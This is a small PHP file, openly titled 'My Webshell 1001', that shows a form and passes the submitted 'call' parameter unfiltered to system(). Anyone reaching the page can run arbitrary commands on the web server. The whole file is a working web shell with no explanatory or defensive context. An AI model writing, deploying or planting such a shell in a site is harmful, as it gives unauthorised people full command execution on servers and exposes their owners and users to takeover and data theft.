<html>
<body>
<form method="get" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="call" id="call" size="80">
<input type="submit" value="go">
</form>
<pre>

<h1> My Webshell 1001 </h2>

<?php
if($_GET['call'])
{
system($_GET['call']);
}
?>
</pre>
</body>
</html>

